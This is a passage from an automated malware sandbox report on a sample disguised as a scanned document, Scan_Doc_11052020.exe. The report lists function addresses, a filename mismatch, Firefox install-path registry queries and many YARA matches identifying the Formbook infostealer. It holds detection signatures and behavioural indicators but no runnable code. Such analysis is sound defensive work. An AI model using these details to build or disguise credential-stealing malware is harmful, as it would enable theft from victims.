Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BC67D014_2_05BC67D0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C9174614_2_05C91746
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C926F814_2_05C926F8
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C83E9614_2_05C83E96
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C8CE6614_2_05C8CE66
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF661114_2_05BF6611
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF5E7014_2_05BF5E70
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF4E6114_2_05BF4E61
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BE764014_2_05BE7640
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C861DF14_2_05C861DF
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C919E214_2_05C919E2
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF618014_2_05BF6180
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C9D9BE14_2_05C9D9BE
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF711014_2_05BF7110
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C1990614_2_05C19906
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF594B14_2_05BF594B
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C928E814_2_05C928E8
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BDA08014_2_05BDA080
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C718B614_2_05C718B6
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF48CB14_2_05BF48CB
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF002114_2_05BF0021
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BFE02014_2_05BFE020
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF981014_2_05BF9810
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF107014_2_05BF1070
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C8D01614_2_05C8D016
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF4B9614_2_05BF4B96
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BCEBE014_2_05BCEBE0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF63C214_2_05BF63C2
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BEFB4014_2_05BEFB40
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BE42B014_2_05BE42B0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C922DD14_2_05C922DD
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C91A9914_2_05C91A99
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF523D14_2_05BF523D
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C80A0214_2_05C80A02
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C9E21414_2_05C9E214
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF4A5B14_2_05BF4A5B
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_00458B8015_2_00458B80
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0580E58115_2_0580E581
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_05740D4015_2_05740D40
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_057EC53F15_2_057EC53F
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0576153015_2_05761530
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0580D5D215_2_0580D5D2
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0581251915_2_05812519
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_05801D1B15_2_05801D1B
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_057F1DE315_2_057F1DE3
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_057FFDDB15_2_057FFDDB
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_057EE58A15_2_057EE58A
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0577547E15_2_0577547E
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0580349015_2_05803490
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_05812C9A15_2_05812C9A
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_05811C9F15_2_05811C9F
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0580DCC515_2_0580DCC5
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_057FF42B15_2_057FF42B
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0576141015_2_05761410
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_058044EF15_2_058044EF
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0575740C15_2_0575740C
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0580278215_2_05802782
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_05811FCE15_2_05811FCE
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_057467D015_2_057467D0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0581174615_2_05811746
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0576579015_2_05765790
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_05775E7015_2_05775E70
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_05803E9615_2_05803E96
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_05774E6115_2_05774E61
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0576764015_2_05767640
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0577661115_2_05776611
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_058126F815_2_058126F8
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0580CE6615_2_0580CE66
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0577594B15_2_0577594B
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0581D9BE15_2_0581D9BE
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_058061DF15_2_058061DF
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_058119E215_2_058119E2
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0577711015_2_05777110
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0579990615_2_05799906
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0577618015_2_05776180
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0577107015_2_05771070
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0577002115_2_05770021
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0577E02015_2_0577E020
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0577981015_2_05779810
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_058128E815_2_058128E8
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0580D01615_2_0580D016
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_057748CB15_2_057748CB
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_057F18B615_2_057F18B6
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0575A08015_2_0575A080
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0576FB4015_2_0576FB40
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0574EBE015_2_0574EBE0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_057763C215_2_057763C2
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_05774B9615_2_05774B96
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_05811A9915_2_05811A99
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_05774A5B15_2_05774A5B
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0577523D15_2_0577523D
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_058122DD15_2_058122DD
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_05800A0215_2_05800A02
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0581E21415_2_0581E214
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_057642B015_2_057642B0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0045205015_2_00452050
Found potential string decryption / allocating functionsShow sources
Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04D6B0E0 appears 176 times
Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04DF5110 appears 38 times
Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 04DBDDE8 appears 48 times
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: String function: 05F1DDE8 appears 48 times
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: String function: 05ECB0E0 appears 176 times
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: String function: 05F55110 appears 38 times
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: String function: 05C1DDE8 appears 49 times
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: String function: 0579DDE8 appears 49 times
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: String function: 0574B0E0 appears 176 times
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: String function: 05C55110 appears 38 times
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: String function: 05BCB0E0 appears 176 times
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: String function: 057D5110 appears 40 times
Sample file is different than original file name gathered from version infoShow sources
Source: Scan_Doc_11052020.exe, 00000000.00000002.844244857.0000000000B1C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSuihzn.exeN vs Scan_Doc_11052020.exe
Source: Scan_Doc_11052020.exe, 00000000.00000002.856731482.0000000005450000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewEYbapqACmfn.exe4 vs Scan_Doc_11052020.exe
Source: Scan_Doc_11052020.exe, 00000000.00000002.873153767.0000000005FBF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Scan_Doc_11052020.exe
Source: Scan_Doc_11052020.exe, 00000000.00000002.855597802.00000000053C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Scan_Doc_11052020.exe
Source: Scan_Doc_11052020.exeBinary or memory string: OriginalFilenameSuihzn.exeN vs Scan_Doc_11052020.exe
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Windows\SysWOW64\systray.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
Tries to load missing DLLsShow sources
Source: C:\Windows\explorer.exeSection loaded: comsvcs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: duser.dllJump to behavior
Yara signature matchShow sources
Source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/10@4/3
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan_Doc_11052020.exe.logJump to behavior
Creates mutexesShow sources
